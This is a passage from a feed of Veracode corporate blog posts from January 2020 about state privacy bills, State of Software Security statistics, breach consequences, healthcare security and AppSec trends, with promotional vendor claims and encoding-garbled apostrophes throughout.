give consumers the right to access, transfer, and delete their personal information, or deny the sale of such information. It will also give consumers the right to take action if their information is leaked. Like CCPA, the bill would apply to any legal entity that has annual gross revenues over $25,000,000, processes data of more than 50,000 New Hampshire consumers, or derives 50 percent of its revenue from selling personal information.</p> <h4><strong>New York Privacy Act</strong></h4> <p>The <a href="">New York Privacy Act</a>, SB 5642, was sent to the Senate Standing Committee on Consumer Protection on January 8, 2020. If approved, the bill will improve transparency, add protection, and allow for action against personal data. Personal data will include biometric information and internet or electric network activity.</p> <h4><strong>What steps can you take to protect your clients and your business? </strong></h4> <p>These regulations, and others, like the EU GDPR, signal that protecting and securing consumer data will increasingly be required, and application security plays a role in that requirement. Whether you are looking to expand your application security (AppSec) program to further comply with the new regulations, or you are looking to start your first AppSec program, we can help. Our <a href="//">Veracode Verified</a> program gives you a clear AppSec roadmap to follow, helping to ensure that security is weaved into your development process.</p> <p>In addition, by participating in the program, you can earn a Veracode Verified seal, which demonstrates to customers that you are dedicated to securing your applications and protecting their personal data.</p> <p><a href="">Contact us today</a> to learn how to better secure your applications to comply with industry standards.</p> Fri, 17 Jan 2020 00:00:00 -0500 (hgoslin) ver45741 State of Software Security v10: 5 Key Takeaways for Developers <img src="/sites/default/files/styles/resize_960/public/SOSS%20X%20Developer%20Takeaways.png?itok=SmY8KPRp" width="960" height="480" typeof="foaf:Image" /><p>In case you missed it, this year we launched our 10<sup>th</sup> annual <a href="//"><em>State of Software Security</em></a> (SOSS X) report! Armed with a decade of data, the Veracode team analyzed 85,000 applications to study trends in fix rates, mounting security debt, shifts in vulnerability by language, and more.</p> <p>What did we uncover? At the core of our research, we found there???s still a need for better remediation processes and more frequent security scans. But we also uncovered some best practices that are leading to significant application security improvements. Read on for a snapshot of key takeaways that can help set you and your organization up for AppSec success in 2020.</p> <h4><strong>Most apps still don???t pass crucial compliance tests </strong></h4> <p><a href="//">OWASP Top 10</a> vulnerabilities and <a href="">SANS 25</a> software errors represent consensus listings of the most critical flaws in the industry, and while we???ve seen some changes in compliance rates across past editions of our SOSS report, the 10-year trend shows us that things haven???t shifted much as of late. Today, 68 percent of apps fail to pass OWASP on initial scan (down from 77 percent in volume one of SOSS), and 67 percent of apps fail to pass SANS on initial scan ???the same figure in volume one as volume ten.</p> <p>The fact that these common and serious vulnerabilities are still prevalent in code underscores the fact that we are not creating environments where developers can code securely. The absence of proper secure coding training, as well as the lack of access to the right tools, is clearly creating risk.</p> <h4><strong>Android, PHP, iOS, and C++ have a high frequency of flaws</strong></h4> <p>This year???s data analysis found that over 90 percent of Android, PHP, and iOS applications contain security flaws on initial scan. Ranking over 80 percent were C++, .NET, and Java, while Python and JavaScript came in with the lowest flaw rates.</p> <p> <div class="media media-element-container media-default"> <div id="file-25381" class="file file-image"> <div class="content"> <img style="" alt="Language Scans" title="Language Scans" class="media-element file-media-responsive media-wysiwyg-align-center" src="//" height="377" width="725"> </div> </div> </div></p> <p>Why do we see a higher rate of flaws in mobile languages? Perhaps the reason Android and iOS are two of the top offenders is that many mobile applications aren???t properly scanned before they???re uploaded to the Apple App Store and the Google Play Store.&nbsp;Ben&nbsp;Greenwald, Director of Software Engineering at Veracode, explains further:&nbsp;</p> <p>???One reason Android and iOS applications may tend to have more security flaws on first scan is because mobile developers believe they are already covered. Developers might assume that Apple and Google thoroughly test apps before they???re released, or they rely on Apple and Google for testing under the assumption that a security infrastructure is already in place.???</p> <p>This issue only further highlights the need for thorough internal and third-party testing processes to ensure that your applications are secure.</p> <p>Language also adds yet another layer to the issue of unfixed flaws piling up on developer plates; the average security debt for PHP and C++ is massive compared to that of .NET, Android, Java, and JavaScript.</p> <p> <div class="media media-element-container media-default"> <div id="file-25386" class="file file-image"> <div class="content"> <img style="" alt="Language Flaw Debt" title="Language Flaw Debt" class="media-element file-media-responsive media-wysiwyg-align-center" src="//" height="687" width="1220"> </div> </div> </div></p> <p>As two of the top languages for flaw rates, it makes sense that unchecked issues in PHP and C++ can spin out of control for development teams. So, what???s their deal? PHP???s start in the mid 90s came with a basic design that works well for smaller applications and beginners learning to code, but it has since been so widely adopted and stretched beyond its means that it is left highly vulnerable to flaws.</p> <p>C++ is an incredibly robust language that powers many of the operating systems, browsers, and productivity apps that we use in our daily life. But with that great power comes the great responsibility to manage memory, guard against use-after-free, and keep stacks from exceeding the fill line. These flaws tend to accumulate over time and are easier to introduce than in many of the today???s more commonly used higher-level languages.</p> <p>While some applications are prone to debt buildup because they use multiple languages or a basic flaw-heavy language like PHP, it???s important to consider the steps your team can take to counterbalance the prevalence of flaws???like reprioritization.&nbsp;</p> <h4><strong>Remediation priorities are misaligned for top vulnerabilities</strong></h4> <p>Out of the 85,000 applications tested (including 1.4 million individual scans), our data shows that 83 percent of apps have at least one flaw when they???re initially scanned. That???s an 11 percent increase from volume one to volume ten of the SOSS report - but the good news is we also saw an overall 14 percent decrease in applications with high-severity flaws.</p> <p>The bad news? Focus is, it seems, not always placed on fixing the right flaws. For example, we found that A10-Logging is ranked the lowest in flaw prevalence but is at the top of the list for fix rate, the bottom of the list for incidents, and doesn???t rank for exploit risk. A5-Access Control is another mystifying trend. It ranks low in prevalence but towards the top of exploit and incident rankings, falling right in the middle of the list for fix rate.</p> <p>Some flaws and fixes are consistent, though. Both A1-Injection and A2-Authentication sit toward the top of the list across the board, while A8-Deserialization is reliably stable in the bottom half of each category. This discrepancy sheds some light on which flaws are neglected, deferred, targeted, and prioritized, and how DevOps teams can more efficiently rank issues.</p> <p>Flaws that can be remediated quickly on a small scope are naturally resolved ahead of flaws that are slightly more complicated, but often those severe issues are less difficult to fix, underscoring the need for a more comprehensive plan of attack.</p> <h4><strong>Developers favor recency, adding to security debt</strong></h4> <p>SOSS X shows us that developers typically follow a LIFO (Last In, First Out) method instead of a FIFO (First In, First Out) approach. With LIFO, developers run the risk of contributing to security debt when older flaws are stacked underneath newer issues. As time goes by, the probability of remediation drops significantly, and any unmitigated remnants slide into the land of security debt.</p> <p>This trend highlights an ongoing battle with security debt across the industry and draws attention to how it muddies the waters of remediation. Fortunately, we have revealing data on scanning cadence that can help reduce an organization???s debt over time.</p> <h4><strong>Bursty scans contribute to security debt???but it???s reversible</strong></h4> <p>We mention <a href="">security debt</a> throughout the SOSS X report (and this post) because it can leave organizations vulnerable to attacks in the backlog of flaws, and slower to mitigate issues that arise out of the blue.</p> <p>The good news is, this year we also uncovered evidence of practices that are chipping away at security debt. It???s all about scanning frequency. We know that ???bursty??? scanning cadences result in a higher prevalence of flaws over time, as opposed to steady and early scan processes with fewer flaws open at once. Sometimes bursty scanning simply fits your waterfall development cycle or pairs with testing schedules that are event-driven, but this can leave security holes where flaws are missed month to month.</p> <p> <div class="media media-element-container media-default"> <div id="file-25391" class="file file-image"> <div class="content"> <img style="" alt="Bursty Scans" title="Bursty Scans" class="media-element file-media-responsive media-wysiwyg-align-center" src="//" height="446" width="1220"> </div> </div> </div></p> <p>Based on our data, we know that development teams can improve their median time to remediation (MedianTTR) by about 70 percent with established procedures and consistent testing schedules. Automating your processes to increase scanning tempo and improve prioritization reduces the security debt that your organization carries.</p> <h4><strong>Read the report</strong></h4> <p>Want to see all this data in one complete package? Read the <a href="//">full SOSS report</a> to learn more about the state of DevSecOps, discover additional data highlights by industry, and more.</p> Mon, 13 Jan 2020 09:38:25 -0500 (mmcbee) ver45611 The Consequences of Security Breaches Are Becoming More Severe <img src="/sites/default/files/styles/resize_960/public/Job%20Security.png?itok=tXq2j6GI" width="960" height="480" typeof="foaf:Image" /><p>With the prevalence of cyberattacks, breaches, and data leaks heading into 2020, it???s becoming commonplace for employees to part ways with their organization after a security incident. Although the consequences from a breach were less severe in the past, reactions are shifting as data leaks are deemed more dire than ever before.</p> <p>A 2018 report from <a href="">Kaspersky Lab</a> surveyed 6,000 people in 29 countries and found that, globally, 31 percent of cybersecurity incidents resulted in the layoff of employees at impacted companies. In roughly a third of these cases, those employees holding senior IT positions were most often let go from their roles after a breach or security incident.</p> <p>The results from Kaspersky???s survey also revealed that 32 percent of C-level managers and CEOs in the United States were laid off post-breach. That number is lower in other countries but still higher overall than most functional roles within and outside of IT, representing a growing trend in how organizations respond to breach backlash. As cybersecurity professionals are in high-demand and C-level managers <a href="//">cost a pretty penny</a>, making the decision to part ways is not always easy.</p> <h4><strong>Weathering the post-breach storm</strong></h4> <p>With great power comes great responsibility. In 2017, the CIO of Equifax U.S. Information Solutions, Jun Ying, was <a href="">sent to jail</a> and forced to pay $55,000 for insider trading after it was discovered that he shared information about a breach before it was made public by the company. In the same year, Uber???s CSO Joe Sullivan was let go after he allegedly helped <a href="">cover up</a> a bug bounty pay-out for over $100,000, paying attackers in exchange for the deletion of stolen data on 57 million drivers and passengers. Both Sullivan and security lawyer Craig Clark were fired from the company.</p> <p>Sometimes privacy-minded employees clash with their own organization???s policies and can eliminate a role altogether. For example, Facebook???s former CSO, Alex Stamos, left a security role at the social media powerhouse after he allegedly disagreed with how Facebook handled the very public Cambridge Analytica scandal. In 2018, Facebook made the decision <a href="">not to replace Stamos</a> and to instead rely on introducing security engineers, analysts, investigators, and other specialists into their engineering and product teams. It was a testament to how fast things can change within an organization???s security team.</p> <p>In other situations, ex-employees can cause unanticipated headaches with ripple effects of their own. Capital One <a href="">fell prey</a> to cyberattacker Paige Thompson when she infiltrated the company???s third-party cloud server to access 106 million customer records in 2019. Thompson, previously an Amazon Web Services software engineer, allegedly built a scanning tool that looked for misconfigured cloud servers on the web providing easy access to username and password credentials.</p> <p>These examples lead to a logical question: if your business is unable to fortify its internal processes and protect sensitive information, is it trustworthy to consumers? With a solid plan for security and remediation in place, the risk of job loss and consumer distrust diminishes.</p> <h4><strong>Getting serious about your security </strong></h4> <p>As breaches and cyberattacks lead to high-profile firings that play out in the media, the public is paying attention. A recent <a href="">IDG Survey Report</a>, <em>Security as a Competitive Advantage</em>, found that 66 percent of respondents are more likely to work with a vendor whose application security has been validated by an established, independent expert.</p> <p>Additionally, 99 percent of those surveyed for the report welcome the advantages of working with a certified and secure vendor, such as improved protection of IP data that leads to peace of mind for their customers. There are measures your organization can take to boost customer confidence, give you a competitive advantage, and potentially prevent the loss (monetary or otherwise) from a breach or cyberattack.</p> <p>In addition to incorporating security testing into your software development, third-party validation of your security efforts shows prospects and customers alike that securing data is a top priority in your organization???s application development process.</p> <p>Independent security validation comes with a number of benefits, enabling vendors to:</p> <ul> <li>Proactively address any questions a prospect might have about security</li> <li>Instill confidence in buyers that they???re choosing a vendor who cares about their data</li> <li>Speed up sales cycles by eliminating the need for back-and-forth validation</li> <li>Stay one step ahead of security concerns from customers and prospects</li> <li>Integrate more efficiently with development teams to improve security</li> </ul> <p>With third-party validation in place, you not only have proof positive that your organization cares about security, but also a roadmap for maturing your application security program. The risk of losing employees to high-profile incidents also diminishes. Eliminating concern and doubt sets you apart with a competitive advantage in the marketplace that sends a clear message to buyers: you???re serious about security.&nbsp;&nbsp;</p> <p><a href="//">Learn how</a> the Veracode Verified program can help position you as a trusted and secure vendor so that you???re ready when a prospect comes calling.</p> Fri, 10 Jan 2020 11:49:23 -0500 (mmcbee) ver45601 Did You Read Our Most Popular 2019 Blog Posts? <img src="/sites/default/files/styles/resize_960/public/top_2019_blogs.png?itok=ydUbJRtT" width="960" height="480" typeof="foaf:Image" /><p>What were your biggest AppSec questions and concerns in 2019? Want to find out what others??? were? Every January, we look at the most-read blog posts from the previous year, and it always proves to be a valuable exercise for us, and we hope for you as well. The posts below were favorites among our readers in 2019 and highlight the software security issues that were top of mind. Their popularity could also stem from the very practical advice they contain; we got the message, look for more of the same in 2020!</p> <h4><strong>Detailed information on vulnerabilities and exploits ??? and how to prevent and avoid</strong></h4> <p>The blog posts below contain detailed explanations of vulnerabilities and exploits from our own research team and penetration testers. Clearly, there is an appetite for a first-hand closer look at how developers are creating vulnerabilities, and how attackers are exploiting them.</p> <p><a href="//">Exploiting Spring Boot Actuators</a></p> <p><a href="//">Exploiting JNDI Injections in Java</a></p> <p><a href="//">Data Extraction to Command Execution CSV Injection</a></p> <p><a href="//">The Top Five Web Application Authentication Vulnerabilities We Find</a></p> <h4><strong>Managing open source risk</strong></h4> <p>As in the past several years, blog posts on open source risk, and how Veracode helps to reduce it, landed in the top 10.</p> <p><a href="//">Introducing New Veracode Software Composition Analysis</a></p> <p><a href="//">How Veracode Scans Docker Containers for Open Source Vulnerabilities</a></p> <h4><strong>Complying with AppSec regulations</strong></h4> <p>As major data breaches continue to expose customers??? sensitive data and cause major monetary and reputation damage to organizations, regulators are taking notice. From the <a href="">EU General Data Protection Regulation</a> (EU GDPR) to the <a href="">NY State Department of Financial Services (NY DFS) Cybersecurity Regulations</a>, more regulations are including application security requirements, and complying with them is becoming a major driver for security professionals. In turn, two blog posts about cybersecurity regulations were featured on the most-read list for 2019.</p> <p><a href="//">PCI Releases Software Security Framework</a></p> <p><a href="//">Ohio Senate Bill 220 Incentivizes Businesses to Maintain Higher Levels of Cybersecurity</a></p> <h4><strong>Subscribe to our content</strong></h4> <p>Did you miss any of these posts last year? Don???t miss a thing in 2020; <a href="">subscribe to our content</a>.</p> Thu, 09 Jan 2020 10:34:29 -0500 (sciccone) ver45586 Work in Healthcare? This is Why You Should Give Your Security a Checkup <img src="/sites/default/files/styles/resize_960/public/Healthcare%20Security.png?itok=rvwg-bZD" width="960" height="480" typeof="foaf:Image" /><p>Most patients practice preventative care through regular trips to the doctor, catching minor issues before they turn into major medical problems. So, why don???t more organizations follow suit with security testing to prevent breaches and fortify the safety of patient information?</p> <p>Too often, remediation is an afterthought as developers scramble to patch holes in their systems post-breach. A recent report in the journal of Health Services Research suggests that this herculean effort can put a strain on patient health when things slow down after a breach and new security measures are introduced. However, preventative care can work in the security world just as it does for your health.</p> <h4><strong>Less isn???t more in healthcare cybersecurity</strong></h4> <p>Some experts and industry thought leaders see unfortunate breaches as opportunities to better understand what went wrong and how it can be prevented in the future. Unfortunately, information from these breaches sometimes muddies the tumultuous waters of cybersecurity and can cause panic over increased security procedures.</p> <p>Josephine Wolff, assistant professor of cybersecurity policy at Tufts Fletcher School of Law and Diplomacy, found that the 2019 report published in the journal of Health Services Research draws dangerous conclusions about the negative impacts of mitigating cyberattacks in healthcare. The <a href="">HSR paper</a> proposes that lost passwords and associated security measures???like two-factor authentication???hold up patient care with increased wait times for ECGs and result in higher rates of fatal heart attacks. A point, they suggest, that should lead to less aggressive security efforts.</p> <p>In her <a href="">article</a>, Wolff proposes that a slower remediation process is <em>precisely</em> why more medical institutions should view this as a crucial pivot point, not a nuisance. She explains, ???Undoubtedly, IT upgrades and updates can inconvenience workers and slow down operations in any workplace, but that is a reason to develop techniques and processes for implementing them more smoothly???not to write them off as harmful and counterproductive.??? Even the most basic preventive actions are crucial best practices, and they???re just a starting point.</p> <h4><strong>The cyberattack epidemic in healthcare</strong></h4> <p>Data from the last decade shows just how damaging breaches can be for institutions and patients alike. According to <a href="">HIPAA Journal</a>, there were 2,546 healthcare breaches from 2009 to 2018 that exposed over 180,000,000 patient records to attackers, resulting in costly settlements and fines for HIPAA violations. Additionally, figures from the <a href="">Protenus 2019 Breach Barometer</a> report reveal that in 2018 alone, the healthcare sector saw a whopping 15,085,302 patient records breached???a number that nearly tripled from 2017 to 2018.&nbsp;</p> <p>These trends are alarming but important to watch. Our 10<sup>th</sup> annual <a href="//">State of Software Security (SOSS) report</a> examines trends in various industries, <a href="">including healthcare</a>, and the data sheds some light on why it???s so crucial for organizations to get a jump on security measures.&nbsp;</p> <p> <div class="media media-element-container media-default"> <div id="file-25281" class="file file-image"> <div class="content"> <img style="" alt="Healthcare Security Rank" title="Healthcare Security Rank" class="media-element file-media-responsive media-wysiwyg-align-center" src="//" height="263" width="738"> </div> </div> </div></p> <p><span style="font-size: 13.008px;">We found that healthcare institutions have the highest prevalence of severe flaws at 52 percent and are the slowest to fix said flaws, with a median time-to-remediation (MedianTTR) of 131 days. All this typically contributes to </span><a href="" style="font-size: 13.008px;">security debt</a><span style="font-size: 13.008px;">, which accumulates over time as more and more flaws are left uncorrected.</span></p> <p>Daunting security debt is a problem that your DevOps team can tackle with the right processes in place, including a steady cadence of scans. Our SOSS report found that those who conduct up to 12 scans per year have a MedianTTR of 68 days, while those who scan more than 260 times per year have a MedianTTR of just 19 days (that???s a substantial 72 percent reduction in remediation time).</p> <p>Increasing the regularity of your scans can have a lasting impact on security debt. In fact, we found that frequent scanners carry 5x less security debt than sporadic scanners who lack a reliable testing process. The remedy is clear: scanning often and speeding up fix rates to mitigate severe flaws will cause far fewer headaches in the future and, ultimately, prevent downtrends in patient care.</p> <h4><strong>A process-minded prognosis</strong></h4> <p>The good news in this year???s SOSS report is that healthcare institutions have a fix rate of 72 percent, which is decent when compared to other industries. Still, hospitals and healthcare providers must stay on top of application scanning to increase frequency and efficiency, cutting down their MedianTTR.</p> <p>The solution? Shifting DevSecOps behaviors from reactive to proactive through keener code management and more thorough remediation processes. This entails making sure security programs:</p> <ul> <li>Include a trained team of security-minded developers</li> <li>Cover all applications across your health organization</li> <li>Include a frequent and steady scanning cadence</li> <li>Have ample resources developers can tap into for testing and fixes</li> <li>Are adaptable enough to handle shifting landscapes in cybersecurity</li> <li>Are equipped to cover third-party vendors used by the organization</li> </ul> <p>Taking steps towards a well-rounded security program not only bolsters your defense against attacks but also sheds light on wrinkles in your remediation process that need ironing. With these measures in place, if a breach or a cyberattack occurs, your healthcare organization will be better equipped to handle issues with minimal to no impact on patient care.</p> <h4><strong>Learn more about cybersecurity in healthcare</strong></h4> <p>Like what you see? Find more info about the state of cybersecurity for healthcare by downloading <a href="">our SOSS Volume 10 Industry Snapshot</a>, and then check out <a href="//">the full report</a> to keep a pulse on the shifts in DevSecOps over the last ten years.&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> Wed, 08 Jan 2020 15:16:57 -0500 (mmcbee) ver45551 Veracode CEO Sam King Recognized in WomenInc. Magazine’s 2019 Top Influential Corporate Directors <img src="/sites/default/files/styles/resize_960/public/SamKing_honored_corporate_director-min.png?itok=Locy6rrN" width="960" height="480" typeof="foaf:Image" /><p>We???re thrilled to announce that Veracode Chief Executive Officer Sam King has been named one of <em>WomenInc</em>. Magazine???s 2019 Most Influential Corporate Directors!</p> <p>Honoring influencers, achievers, and executives, this announcement recognizes women who are making notable contributions to the world of business and technology. The list compiled by <em>WomenInc</em>. Magazine includes over 700 directors serving on the boards of S&amp;P 1000/Mid-Cap publicly held companies.</p> <p>To celebrate these accomplished leaders, <em>WomenInc</em>. maintains an exclusive <a href="file:///C:/Users/pdaly/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/TJ5XRL47/">online directory</a> of honorees and publishes their yearly announcement in seasonal editions of the magazine.</p> <p>King is recognized for her contributions on behalf of Progress Software, the leading provider of application development and digital experience technologies. Since joining the Board of Directors in February 2018, she has contributed to the implementation of Progress??? business strategy as well as its charter to operate as a socially responsible organization.</p> <p>She is also a well-known expert in cybersecurity and is a founding member of the Veracode team. She helped lead the establishment and evolution of the application security category alongside industry experts and analysts. Veracode is the largest independent application security provider worldwide, valued at $1 billion.</p> <p>???It is essential that the achievements and success of professional women are showcased in the highest regard and their stories are told in meaningful ways,??? said Catrina Young, the Executive Vice President and Chief Communications Officer of&nbsp;<em>WomenInc</em>. ???We are proud that we can recognize this distinguished group of women and we are inspired by their accomplishments, their distinguished careers and the corporations that demonstrate an inclusive board composition. We offer our congratulations.???</p> <p>Encouraging positive dialogue from influential female voices in leadership, <em>WomenInc</em>. Magazine is a media platform dedicated to fostering the ideas, events, social commentary, and stories that inspire professional women.</p> <p>To see the full list of honorees, visit the directory <a href="">here</a> or grab a copy of <em>WomenInc.</em>???s winter issue from your local newsstand.</p> Tue, 07 Jan 2020 10:14:15 -0500 (jlavery) ver45516 Security at DevOps Speed: How Veracode Reduces False Positives <img src="/sites/default/files/styles/resize_960/public/Untitled%20design%20%2824%29.jpg?itok=tUc9i-4b" width="960" height="360" typeof="foaf:Image" /><p><em>Originally Published on November 27, 2017 -- Updated on January 7, 2020</em></p> <p>Application security solutions that slow or stall the development process simply aren???t feasible in a DevOps world. AppSec will increasingly need to fit as seamlessly as possible into developer processes, or it will be under-used or overlooked. But overlooking AppSec puts your organization at high risk of a damaging breach. Our most recent&nbsp;<a href="">State of Software Security</a>&nbsp;report found that a whopping 83 percent of apps had at least one vulnerability on initial scan. Leaving your code vulnerable leaves your organization open to breach. In the end, you need AppSec, but you also need AppSec that developers will use. Reduction of false positives is a big part of this requirement. False positives are always a key concern because they make&nbsp;developers and security&nbsp;folks spin their wheels, so solutions should minimize them as much as possible.</p> <h4><strong>How Veracode Works to Reduce False Positives</strong></h4> <p>We aim for full automation and high speeds for all of our scans, but that doesn???t mean that we compromise on quality. Unique to our position as a SaaS provider, our security research team regularly samples customer app submissions to manually review flaws. This ensures that we have met our standards for accuracy in terms of both false positives and negatives. By reviewing actual customer apps, we get a much broader and realistic set of cases than would be possible in a QA lab that only tests applications built as internal test cases.</p> <p>Our review of these applications leads to improvements that are implemented back into our&nbsp;<a href="//">static analysis engine</a>.&nbsp;</p> <h4><strong>The SaaS Advantage</strong></h4> <p>As a native SaaS provider, Veracode has a strategic advantage in improving false-positive rates. To date, we???ve assessed over 13.5 trillion lines of code and performed more than 4 million scans, and with every release, our solution gets smarter. On-premises solutions, on the other hand, require their customers to manually create custom rules to adjust for false positives in their vendor???s software, which can be very time consuming and complicated, or to wait for their on-premises vendor to release a new revision to the scanner, which requires downtime and unplanned work for the security teams. We at Veracode improve our static analysis engine at least monthly, and improvements we have made by observing the behavior of all customer applications are available with minimal disruption to your processes.</p> <p>The result for our customers is that they get very high quality at high speeds (89 percent of our scans finish in less than an hour), without having to train and maintain a team for customizing scan rules to avoid false positives. This rule customization can be costly and time consuming, and requires a skill set that is hard to come by. In addition, customizations can be challenging to maintain if the person who wrote the code leaves the company. Finally, rule customization can muddy results for attestations ??? it???s hard to prove to third parties that your apps are secure if anyone can rig the results by manipulating rules.</p> <p>On the other hand, our false-positive rate is a low 1.1 percent ??? with zero rule customizing. This 1.1 percent false positive rate across real-world applications is verified and based on feedback from our customers on vulnerabilities they have reviewed. By comparison, our competitors claim a 32 percent false positive rate.</p> <h4><strong>Bottom Line</strong></h4> <p>The Veracode solution has scanned hundreds of thousands of enterprise, mobile and cloud-based apps, and we???ve helped our customers fix more than 48 million flaws. Bottom line? Better analytics, faster improvements, increased accuracy and the ability to create more software, more securely than ever before.</p> <p>Find out more about the <a href="//">Veracode Application Security solution</a>.</p> Tue, 07 Jan 2020 09:56:05 -0500 (jjanego) ver28556 SC Media Inducts Veracode into its 2019 Innovator Hall of Fame <img src="/sites/default/files/styles/resize_960/public/shutterstock_576245266-min.png?itok=WVNVDH7B" width="960" height="480" typeof="foaf:Image" /><div style="text-align:center;"><img src="//" style="width:100%;"></div> <p>We are excited to announce that Veracode has been inducted into SC Media???s 2019 <em>Innovator Hall of Fame</em>. To select the honorees, the SC Media team leverages data from SC Labs testing groups, conferences, research, and referrals. The team then evaluates the nominees against strict criteria to ensure that the final selection is comprised of vendors with the most promising products and capabilities.</p> <p>We???re honored to be one of only five new Hall of Fame inductees!</p> <p>To announce its innovators, SC Media publishes an annual eBook highlighting the selected vendors??? greatest strengths.</p> <p>???We interviewed each vendor to understand the security problems they identified and mitigated with their latest innovations,??? the SC Media editors wrote. ???Almost every organization pointed to two interrelated struggles: exhausting technological ???noise??? and personnel fatigue.??? This leaves security operations centers understaffed, overwhelmed, and frustrated, they continued.</p> <p>???The vendors on this list understand these problems and recognize how such issues inhibit business operations and user experiences. They have responded with two helpful solutions: advanced automation and threat prioritization. Many platforms include artificial intelligence and machine learning that recognize patterns and can replicate remediation processes in the future to remove the manual burden from SOCs. Many new solutions also can determine whether a noted threat poses significant or minimal risk and adjust alert policies accordingly. In nearly every case, both automation and threat prioritization are integrated into a platform that can then easily integrate with existing infrastructures, making the transition to these nextgen solutions quick and easy,??? the editors said.</p> <p>Veracode was selected as an honoree in the Virtualization and cloud-based security category. The description said, in part:</p> <p style="margin-left:.5in;"><em>The Veracode Platform provides an entire system of testing, scans and analysis that minimizes the presence of vulnerabilities and produces more secure software as a result. Veracode knows that vendors want to develop, use and sell software with confidence. By integrating into the development process multiple testing techniques ??? including static, dynamic and software composition analysis ??? the Veracode Platform can anticipate many potential vulnerabilities and resolve them before they ever materialize in a software???s final form.</em></p> <p>Veracode also differentiates itself as a SaaS provider, according to SC Media, saying the model ???makes Veracode versatile enough for local and global use, even by organizations with highly distributed personnel or partners.???</p> <p>The recognition went on to say:</p> <p style="margin-left:.5in;"><em>Veracode hopes to influence the cybersecurity ecosystem as well as the organizations they serve, so that vulnerability prevention becomes not just one possible solution amidst a series of alternatives but a standard step in software development procedures. All enterprises developing their own applications will likely benefit from the security measures integrated into the Veracode platform.</em></p> <p>Veracode is also recognized for its ability to ease the workload of security and development teams by integrating multiple testing techniques into the development process. This strength is making a positive cultural impact on the perception of cybersecurity measures.</p> <p>To learn more about our induction into the Innovator Hall of Fame, check out SC Media???s eBook, <a href=";locale=1"><em>Innovators</em></a>. For additional information on our comprehensive suite of products and services, visit the <a href="//">Veracode homepage</a>.&nbsp;</p> Fri, 03 Jan 2020 10:12:48 -0500 (jlavery) ver45436 AppSec Themes to Watch in 2020 <img src="/sites/default/files/styles/resize_960/public/AppSec_2020.png?itok=906zZRuz" width="960" height="480" typeof="foaf:Image" /><p><strong><em>Contributors: </em></strong></p> <p><em>Paul Farrington, Veracode EMEA CTO</em></p> <p><em>Pejman Pourmousa, Veracode VP of Services</em></p> <p><em>Chris Wysopal, Veracode CTO and co-founder</em></p> <p>As we said in the introduction to our 10<sup>th</sup> anniversary <a href="//"><em>State of Software Security</em> report</a> this year, the last 10 years in AppSec saw both enormous change, and a fair amount of stagnation. Part of the reason for the stagnation is that software development is increasing at unprecedented rates, and security is often struggling to keep up. So as we shift our focus from reflection to prediction, we think application security in 2020 will be all about new solutions and best practices to keep up with the pace of development and empower developers to code both quickly and securely. A few AppSec themes we expect to see renewed focus on in 2020 include:</p> <h4><strong>Security champions</strong></h4> <p>With a security skills shortage, and an explosion of software development, it???s time to get creative to spread security skills and know-how across development teams. A <a href="//">security champions program</a> is becoming a popular way to do this, and we expect to see more of these programs in 2020. In a recently released report, <a href=""><em>Building an Enterprise DevSecOps Program</em></a>, security analyst Adrian Lane notes, ???I spoke with three midsized ?ャ?rms this week ??? their development personnel ranged from 800-2000 people, while their security teams ranged from 12 to 25.??? In the same report, he says of assigning security champions to development teams, ???Regardless of how you do it, this is an excellent way to scale security without scaling headcount, and we recommend you set aside some budget and resources ??? it returns far more bene?ャ?ts than it costs.???</p> <p>A security champion is a developer with an interest in security who helps amplify the security message at the team level. Security champions don???t need to be security pros; they just need to act as the security conscience of the team, keeping their eyes and ears open for potential issues. Once the team is aware of these issues, it can then either ?ャ?x the issues in development or call in your organization???s security experts to provide guidance.</p> <p>With a security champion, an organization can make up for a lack of security coverage or skills by empowering a member of the development team to act as a force multiplier who can pass on security best practices, answer questions, and raise security awareness.</p> <h4><strong>Metrics that make sense</strong></h4> <p><a href="//">Metrics</a> ??? or perhaps more accurately, the right metrics ??? are crucial for understanding what???s really happening in your AppSec program. They serve a dual purpose: They demonstrate your organization???s current state, and also show what progress it???s making in achieving its objectives.&nbsp;</p> <p>On the flip side, focusing on the wrong metrics can lead to frustration, disengagement, and a stalled program. If you???ve got an overly stringent AppSec policy ??? for instance, ???fix all flaws found within two weeks??? ??? your metrics will not paint a pretty picture, and your developers will give up before they???ve begun. We think 2020 will be the year of getting AppSec metrics right with smart, achievable, sensible AppSec policies.</p> <p>We will increasingly see a focus on providing developers with simple cues to encourage the right behavior, but in a realistic way. For example, teams start by classifying those security bugs that are highest priority, those that are important but not showstoppers, and those that, although not ideal, are acceptable to exist. Especially for the first two categories, they then track the average time to fix a security bug, baseline, and then negotiate targets so that engineers and product owners can buy-in. These metrics may ultimately help to determine compensation, but perhaps initially are linked to softer benefits for the team.</p> <h4><strong>Security across the pipeline</strong></h4> <p>We???re seeing organizations start to build security into each phase of the development pipeline, and expect to see more of this shift in 2020. From pre-commit scans in the the IDE (my code), to build scans in the CI pipeline (our code), to deployment scans in the CD pipeline (production code), security testing will cover code from inception to production.</p> <h4><strong>Scaling</strong></h4> <p>DevSecOps is no longer niche???organizations are moving faster and producing more software than ever before. Scaling is the name of the AppSec game in 2020. AppSec programs that are cumbersome or slow to scale will not last in this new decade. What are the keys to scaling AppSec?</p> <p><strong>A SaaS-based solution: </strong>The time and budget required to quickly scale an on-premises AppSec solution make it ill equipped for a modern DevSecOps environment.</p> <p><strong>Expert help:</strong> Outside AppSec expertise can be useful in helping to establish your security program???s goals and roadmap. More importantly, it can help keep your roadmap on track by guiding developers through the fixing of flaws your scans find.</p> <p><strong>Security champions:</strong> As we discussed in the section above, security champions will be key to doing more with less security staff.</p> <h4><strong>Regulations</strong></h4> <p>More and more security regulations are specifically calling out the need for application security ??? from NIST, to PCI, NY DFS, and GDPR. In turn, the need for a documented application security processes will become paramount in the new year. <a href="">The Financial Services Sector Cybersecurity Profile</a> from the FSSCC is an example of how FinTech firms are trying to unify reporting standards for the various regulatory frameworks.</p> <h4><strong>Demand for secure software </strong></h4> <p>IT buyers are increasingly questioning the security of software they are purchasing. If you can???t answer questions about your security practices or can???t address your customers??? audit requirements, you???re likely to experience lost or delayed sales opportunities. In some cases, prospects will turn elsewhere. However, vendors that can address these security concerns quickly and effectively stand out among suppliers and leverage security as a competitive advantage. A recent <a href="">survey report</a> we conducted with IDG found that 96 percent of respondents are more likely to consider doing business with a vendor or partner whose software has been independently verified as ???secure.???</p> <p>In addition, thanks to the speed of modern software delivery, we will see the methods for attesting to the security of software change. For example, we anticipate a shift to process-based attestations, such as proof of 